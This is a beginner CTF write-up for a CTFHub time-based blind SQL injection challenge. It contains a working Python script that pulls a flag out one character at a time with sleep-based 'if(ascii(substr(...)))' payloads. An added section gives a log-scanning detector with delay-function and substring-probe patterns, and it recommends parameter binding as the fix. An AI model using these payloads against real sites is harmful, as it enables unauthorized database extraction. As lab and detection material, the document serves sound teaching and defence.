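CTFHub is a good place for beginners to get started.
Once you have the earlier injection types down, time-based injection is still quite simple. When I have time I will supplement this with binary search and make the script more rigorous.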
import requests
import time

url = "http://challenge-8a39656f3810752a.sandbox.ctfhub.com:10080/?id="
database = ""  # characters recovered so far

for i in range(1, 50):  # character position inside the target string
    #print("[%d]" %(i) )
    for j in range(32, 127):  # printable ASCII candidates
        #payload = "if(ascii(substr(database(),1,1))>1,sleep(1.5),1)"
        #payload = "if(ascii(substr(database(),%d,1))=%d,sleep(1),1)" %(i,j )
        payload = "if(ascii(substr((select flag from flag),%d,1))=%d,sleep(1),1)" % (i, j)
        # Time the request: a correct guess makes the database sleep for 1 second
        start = time.time()
        r = requests.get(url + payload, timeout=5)
        end_time = time.time()
        #print(r.status_code)
        if end_time - start > 1:
            #print(end_time - start)
            database += chr(j)
            print(database)
            break
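From the defending side, the script above leaves a clear trace: many requests whose `id` value contains a delay call, a per-character `substr(..., N, 1)` probe, and occasional responses that take just over the sleep interval. The following detector is an added example, not part of the original post; the log format (client IP, request line, status, response time in seconds) and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines: client IP, request, status, response time (s).
SAMPLE_LOG = """\
203.0.113.7 "GET /?id=1 HTTP/1.1" 200 0.012
203.0.113.7 "GET /?id=if(ascii(substr((select%20flag%20from%20flag),1,1))=98,sleep(1),1) HTTP/1.1" 200 0.015
203.0.113.7 "GET /?id=if(ascii(substr((select%20flag%20from%20flag),1,1))=99,sleep(1),1) HTTP/1.1" 200 1.013
203.0.113.7 "GET /?id=if(ascii(substr((select%20flag%20from%20flag),2,1))=116,sleep(1),1) HTTP/1.1" 200 1.011
198.51.100.4 "GET /?id=2 HTTP/1.1" 200 0.010
198.51.100.4 "GET /?id=sleep-tracker HTTP/1.1" 200 0.011
"""

LINE_RE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" (\d{3}) ([\d.]+)$')
# A delay function call inside a parameter value (case-insensitive, optional spaces).
DELAY_RE = re.compile(r'\b(?:sleep|benchmark|pg_sleep)\s*\(', re.I)
# The per-character probe shape: substr/substring/mid(<expr>, <position>, 1)
PROBE_RE = re.compile(r'\b(?:substr|substring|mid)\s*\(.*?,\s*(\d+)\s*,\s*1\s*\)', re.I)

def detect(log_text, slow_seconds=1.0):
    """Return {client_ip: {"probes": n, "slow_hits": n, "positions": [..]}}."""
    findings = defaultdict(lambda: {"probes": 0, "slow_hits": 0, "positions": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, _status, elapsed = m.groups()
        # parse_qs URL-decodes values, so %20 or + encoding does not hide the payload.
        for values in parse_qs(urlsplit(target).query).values():
            for value in values:
                if not DELAY_RE.search(value):
                    continue
                entry = findings[ip]
                entry["probes"] += 1
                # A response at or above the sleep interval means a guess matched.
                if float(elapsed) >= slow_seconds:
                    entry["slow_hits"] += 1
                pos = PROBE_RE.search(value)
                if pos:
                    entry["positions"].add(int(pos.group(1)))
    return {ip: {**e, "positions": sorted(e["positions"])} for ip, e in findings.items()}

if __name__ == "__main__":
    for ip, info in detect(SAMPLE_LOG).items():
        print(ip, info)
```

The number of `slow_hits` approximates how many characters were recovered, which helps scope what data was exposed; the durable fix remains binding `id` as a query parameter instead of concatenating it into the SQL statement.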
Original article: https://www.cnblogs.com/h3zh1/p/12861210.html